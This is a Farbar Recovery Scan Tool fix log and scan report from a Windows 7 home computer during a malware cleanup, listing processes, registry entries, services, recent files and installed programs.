"C:\Users\james\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f35faa2c.lnk" => not found.
"C:\Users\james\AppData\Local\ars.cache" => not found.
"C:\Users\james\AppData\Local\census.cache" => not found.
"C:\Users\james\AppData\Local\housecall.guid.cache" => not found.
"C:\Users\james\AppData\Local\msmathematics.qat.james" => not found.
"C:\Users\james\AppData\Local\resmon.resmoncfg" => not found.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 18144937 B
Java, Flash, Steam htmlcache => 0 B
Windows/system/drivers => 1090538 B
Edge => 0 B
Chrome => 0 B
Firefox => 53503423 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 65593245 B
james => 9872867 B

RecycleBin => 0 B
EmptyTemp: => 149.3 MB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 09:35:58 ====

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-09-2016
Ran by [removed] (administrator) on JAMES-HP (01-10-2016 09:42:24)
Running from C:\Users\[removed]\Desktop
[removed] Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\ModLEDKey.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(PDF Complete Inc) C:\Program Files (x86)\PDF Complete\pdfsvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Canon Inc.) C:\Program Files (x86)\Canon\CAL\CALMAIN.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\CNYHKEY.exe
(CyberLink) C:\Program Files (x86)\Cyberlink\YouCam\YCMMirage.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\HPTouchSmartSyncCalReminderApp.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\…\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7666392 2014-12-11] (Realtek Semiconductor)
HKLM\…\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1340192 2016-01-29] (Microsoft Corporation)
HKLM\…\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1391472 2014-12-11] (Realtek Semiconductor)
HKLM-x32\…\Run: [StartCCC] => c:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [343168 2012-01-27] (Advanced Micro Devices, Inc.)
HKLM-x32\…\Run: [] => [X]
HKLM-x32\…\Run: [LaunchHPOSIAPP] => C:\Program Files (x86)\Hewlett-Packard\HP Keyboard\LaunchApp.exe [385024 2009-04-03] (Hewlett-Packard)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] [removed] [removed] 192.168.1.1
Tcpip\..\Interfaces\{39A2E28A-93C1-45D4-9733-A9040D62B0E6}: [DhcpNameServer] [removed] [removed] 192.168.1.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar;=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar;=msnhome
HKU\S-1-5-21-531013560-757715300-2485835200-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://baynews9.com/content/news/baynews9/weather/klystron-9-radar.map.html/Florida.html
HKU\S-1-5-21-531013560-757715300-2485835200-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar;=iesearch
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-08-16] (Microsoft Corporation)
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> c:\Program Files\AMD\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-29] (Microsoft Corp.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2016-08-09] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-08-16] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> c:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll [2011-06-08] (Advanced Micro Devices)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2016-08-09] (Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Toolbar: HKU\S-1-5-21-531013560-757715300-2485835200-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-04-19] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-05-25] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - c:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll [2011-06-08] (Advanced Micro Devices)

FireFox:
========
FF ProfilePath: C:\Users\james\AppData\Roaming\Mozilla\Firefox\Profiles\6uizn1ze.default-1451233910488
FF DefaultSearchEngine.US: Google
FF Homepage: hxxp://baynews9.com/content/news/baynews9/weather/klystron-9-radar.map.html/Florida.html
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2013-09-16] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2011-05-13] (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-06-30] (Adobe Systems Inc.)
FF HKLM-x32\…\Firefox\Extensions: [[removed]] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: (HP Smart Print) - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2012-12-30] [not signed]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)
R2 CalendarSynchService; C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe [16384 2011-08-16] (Hewlett-Packard) [File not signed]
R2 CCALib8; C:\Program Files (x86)\Canon\CAL\CALMAIN.exe [96341 2005-09-30] (Canon Inc.) [File not signed]
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [3192560 2016-07-26] (Microsoft Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2016-01-29] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [374344 2016-01-29] (Microsoft Corporation)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1128952 2011-08-12] (PDF Complete Inc)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [292568 2014-12-11] (Realtek Semiconductor)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-13] (Microsoft Corporation)
S3 CpqDfw; C:\Windows\System32\drivers\CpqDfw.sys [27456 2012-05-29] (Windows (R) Codename Longhorn DDK provider)
S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S3 EMVSCARD; C:\Windows\System32\Drivers\EMVSCARD.sys [28544 2006-12-13] (USB Smart Card Reader)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [289120 2015-11-13] (Microsoft Corporation)
R3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [133816 2015-11-13] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-01 09:35 - 2016-10-01 09:35 - 00007173 _____ C:\Users\james\Desktop\Fixlog.txt
2016-09-30 18:25 - 2016-09-30 18:25 - 00021695 _____ C:\ComboFix.txt
2016-09-30 18:05 - 2016-09-30 18:25 - 00000000 ____D C:\Qoobox
2016-09-30 18:05 - 2011-06-26 02:45 - 00256000 _____ C:\Windows\PEV.exe
2016-09-30 18:05 - 2010-11-07 13:20 - 00208896 _____ C:\Windows\MBR.exe
2016-09-30 18:05 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2016-09-30 18:05 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2016-09-30 18:05 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2016-09-30 18:05 - 2000-08-30 20:00 - 00098816 _____ C:\Windows\sed.exe
2016-09-30 18:05 - 2000-08-30 20:00 - 00080412 _____ C:\Windows\grep.exe
2016-09-30 18:05 - 2000-08-30 20:00 - 00068096 _____ C:\Windows\zip.exe
2016-09-30 17:49 - 2016-09-30 17:49 - 00448512 _____ (OldTimer Tools) C:\Users\james\Desktop\TFC.exe
2016-09-30 17:47 - 2016-09-30 17:47 - 05659993 ____R (Swearware) C:\Users\james\Desktop\ComboFix.exe
2016-09-30 13:03 - 2016-09-30 13:04 - 00038465 _____ C:\Users\james\Desktop\Addition.txt
2016-09-30 13:01 - 2016-10-01 09:42 - 00012903 _____ C:\Users\james\Desktop\FRST.txt
2016-09-30 12:59 - 2016-10-01 09:42 - 00000000 ____D C:\FRST
2016-09-30 12:58 - 2016-09-30 12:58 - 02404352 _____ (Farbar) C:\Users\james\Desktop\FRST64.exe
2016-09-30 12:51 - 2016-09-30 12:51 - 00002187 _____ C:\Users\james\Desktop\aswMBR.txt
2016-09-30 12:51 - 2016-09-30 12:51 - 00000512 _____ C:\Users\james\Desktop\MBR.dat
2016-09-30 12:23 - 2016-09-30 12:23 - 05198336 _____ (AVAST Software) C:\Users\james\Desktop\aswMBR.exe
2016-09-29 18:51 - 2016-09-29 18:51 - 00000608 _____ C:\Users\james\Documents\cc_20160929_185119.reg
2016-09-29 16:12 - 2016-09-29 16:12 - 00001121 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-09-29 16:12 - 2016-09-29 16:12 - 00001109 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-09-29 16:12 - 2016-09-29 16:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-09-29 16:03 - 2016-09-29 16:03 - 00000484 _____ C:\Users\james\Documents\cc_20160929_160328.reg
2016-09-29 12:55 - 2016-09-29 12:55 - 00000000 ____D C:\Users\james\AppData\Roaming\c252533c
2016-09-26 12:50 - 2016-09-26 12:50 - 03861056 _____ C:\Users\james\Desktop\adwcleaner_6.020.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-01 09:37 - 2012-04-12 01:23 - 00000000 ____D C:\ProgramData\PDFC
2016-10-01 09:37 - 2009-07-14 01:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-10-01 09:23 - 2009-07-14 00:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-10-01 09:23 - 2009-07-14 00:45 - 00024608 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-09-30 18:20 - 2009-07-13 22:34 - 00000215 _____ C:\Windows\system.ini
2016-09-30 12:57 - 2012-12-30 05:01 - 00003926 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{4A93FDEC-C5EA-4C65-8234-08FCE8A3483F}
2016-09-30 12:33 - 2016-05-25 21:51 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-09-30 12:20 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\inf
2016-09-30 10:27 - 2015-07-02 18:58 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-09-29 21:10 - 2016-02-07 14:10 - 00003186 _____ C:\Windows\System32\Tasks\HPCeeScheduleForjames
2016-09-29 21:10 - 2016-02-07 14:10 - 00000332 _____ C:\Windows\Tasks\HPCeeScheduleForjames.job
2016-09-29 16:12 - 2015-07-01 13:23 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-09-28 18:07 - 2009-07-14 01:13 - 00782470 _____ C:\Windows\system32\PerfStringBackup.INI
2016-09-26 19:45 - 2013-01-22 19:40 - 00083064 _____ C:\Users\james\Documents\Train Inventory.xlsx
2016-09-26 12:55 - 2016-04-01 15:04 - 00000000 ____D C:\AdwCleaner
2016-09-25 22:35 - 2016-07-09 11:23 - 06761600 _____ (ESET spol. s r.o.) C:\Users\james\Downloads\esetonlinescanner_enu.exe
2016-09-21 10:40 - 2013-09-16 15:23 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-09-21 10:39 - 2013-09-16 15:19 - 00000000 ____D C:\Program Files\Microsoft Office 15

==================== Files in the root of some directories =======

2012-12-30 11:32 - 2012-12-30 11:32 - 0000057 _____ () C:\ProgramData\Ament.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


ATTENTION: ==> Could not access BCD.


LastRegBack: 2016-09-06 20:38

==================== End of FRST.txt ============================

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-09-2016
Ran by [removed] (01-10-2016 09:44:08)
Running from C:\Users\[removed]\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2012-12-30 08:48:54)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-531013560-757715300-2485835200-500 - Administrator - Disabled)
Guest (S-1-5-21-531013560-757715300-2485835200-501 - Limited - Disabled)
james (S-1-5-21-531013560-757715300-2485835200-1000 - Administrator - Enabled) => C:\Users\james

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {768124D7-F5F7-6D2F-DDC2-94DFA4017C95}
AS: Microsoft Security Essentials (Enabled - Up to date) {CDE0C533-D3CD-62A1-E772-AFADDF863628}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat Reader DC (HKLM-x32\…\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.017.20053 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\…\Adobe AIR) (Version: 2.6.0.19120 - Adobe Systems Incorporated)
AMD Catalyst Install Manager (HKLM\…\{E1A4C1C6-8030-EFD6-8FAF-DC2B275D490B}) (Version: 3.0.859.0 - Advanced Micro Devices, Inc.)
Atlas Track Planning Software 0.9.29 beta (HKLM-x32\…\AtlasTPS_by_Milen_Peev_is1) (Version: 0.9.29 - Milen Peev)
Blio (HKLM-x32\…\{741006D1-7B2B-4E33-B2B0-831F282EEF64}) (Version: 2.2.8188 - K-NFB Reading Technology, Inc.)
Canon Camera Access Library (HKLM-x32\…\CAL) (Version: 8.1.1.17 - )
Canon Camera Support Core Library (HKLM-x32\…\CSCLIB) (Version: 7.3.1.6 - )
Canon Camera Window DC_DV 5 for ZoomBrowser EX (HKLM-x32\…\CameraWindowDVC5) (Version: 5.4.5.17 - )
Canon Camera Window DC_DV 6 for ZoomBrowser EX (HKLM-x32\…\CameraWindowDVC6) (Version: 6.2.0.8 - )
Canon Camera Window MC 6 for ZoomBrowser EX (HKLM-x32\…\CameraWindowMC) (Version: 6.1.0.7 - )
Canon G.726 WMP-Decoder (HKLM-x32\…\Canon G.726 WMP-Decoder) (Version: 1.0.1.3 - )
Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\…\MovieEditTask) (Version: 2.2.0.13 - )
Canon RAW Image Task for ZoomBrowser EX (HKLM-x32\…\RAW Image Task) (Version: 2.3.0.11 - )
Canon RemoteCapture Task for ZoomBrowser EX (HKLM-x32\…\RemoteCaptureTask) (Version: 1.5.0.5 - )
Canon Utilities ZoomBrowser EX (HKLM-x32\…\ZoomBrowser EX) (Version: 5.6.0.27 - )
CCleaner (HKLM\…\CCleaner) (Version: 4.10 - Piriform)
CyberLink YouCam (HKLM-x32\…\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.0.4417 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
ESET Online Scanner v3 (HKLM-x32\…\ESET Online Scanner) (Version:  - )
Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden
HP Application Assistant (HKLM\…\{B34A07DD-C6F7-414A-AE63-01019482EAF0}) (Version: 1.0.393.3870 - Hewlett-Packard)
HP Calendar (HKLM-x32\…\{2B38E0FA-D8A5-4EBF-A018-E3C1C8E7A2E2}) (Version: 5.1.4245.23508 - Hewlett-Packard)
HP Clock (HKLM-x32\…\{0EEC4E49-D4C2-4E23-87F2-B5641F1A09E4}) (Version: 5.1.4244.16367 - Hewlett-Packard)
HP Keyboard (HKLM-x32\…\{B40D7926-AE5F-41EA-8AC6-56C0E2F00E9D}) (Version: 1.5.0.4 - Hewlett-Packard)
HP LinkUp (HKLM-x32\…\{7E750542-55BC-4300-8B7B-AC2A762FB435}) (Version: 2.01.029 - Hewlett-Packard)
HP Magic Canvas (HKLM-x32\…\{DDFDC9D6-4220-41F8-BF9A-8E7512C4EF52}) (Version: 5.1.15.0 - Hewlett-Packard)
HP Magic Canvas Tutorials (HKLM-x32\…\{858FCB65-7C6D-4BA4-AD80-A3CB3744CE09}_is1) (Version: 5.0.0.3 - Hewlett-Packard)
HP Notes (HKLM-x32\…\{86BAB08A-5E66-4C53-82E3-C1E91673C7CA}) (Version: 5.1.4274.30382 - Hewlett-Packard)
HP Odometer (HKLM-x32\…\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Officejet 4620 series Basic Device Software (HKLM\…\{A2E836B3-59A6-486B-82DC-1EA3878BCDEA}) (Version: 26.0.784.0 - Hewlett-Packard Co.)
HP Officejet 4620 series Help (HKLM-x32\…\{606C37AB-EB04-4270-A592-201A03C2DB36}) (Version: 6.0.0 - Hewlett Packard)
HP Officejet 4620 series Product Improvement Study (HKLM\…\{3CF97AC1-219E-44DA-B3DE-32FCAD606231}) (Version: 26.0.784.0 - Hewlett-Packard Co.)
HP RSS (HKLM-x32\…\{A35E58D6-2A0F-4051-983B-79342081338E}) (Version: 5.1.4301.21494 - Hewlett-Packard)
HP Setup (HKLM-x32\…\{F5E7D9AF-60F6-4A30-87E3-4EA94D322CE1}) (Version: 9.0.15130.3904 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\…\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.2.15145.3905 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\…\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}) (Version: 7.4.45.4 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\…\{B2B7B1C8-7C8B-476C-BE2C-049731C55992}) (Version: 11.00.0001 - Hewlett-Packard)
HP TouchSmart RecipeBox (HKLM-x32\…\{20714B53-FC73-4F9C-9687-49EB237D6FD7}) (Version: 3.0.3830.27730 - Hewlett-Packard)
HP Update (HKLM-x32\…\{2EFA4E4C-7B5F-48F7-A1C0-1AA882B7A9C3}) (Version: 5.003.001.001 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\…\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.12.1.0 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\…\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kobo (HKLM-x32\…\Kobo) (Version: 2.0.3 - Kobo Inc.)
LabelPrint (HKLM-x32\…\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.4507 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.4507 - CyberLink Corp.) Hidden
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\…\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Metric Converter (HKLM-x32\…\{D0661463-50F7-4A1E-83CB-37CC590589AE}_is1) (Version: 1.0.0.0 - XM Asia Pacific Pte Ltd)
Microsoft .NET Framework 4.5.2 (HKLM\…\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Mathematics (HKLM-x32\…\{4D090F70-6F08-4B60-9357-A1DFD4458F09}) (Version: 4.0 - Microsoft Corporation)
Microsoft Office Home and Student 2013 - en-us (HKLM\…\HomeStudentRetail - en-us) (Version: 15.0.4859.1002 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\…\Microsoft Security Client) (Version: 4.9.218.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\…\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50428.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-531013560-757715300-2485835200-1000\…\SkyDriveSetup.exe) (Version: 17.0.2003.1112 - Microsoft Corporation)
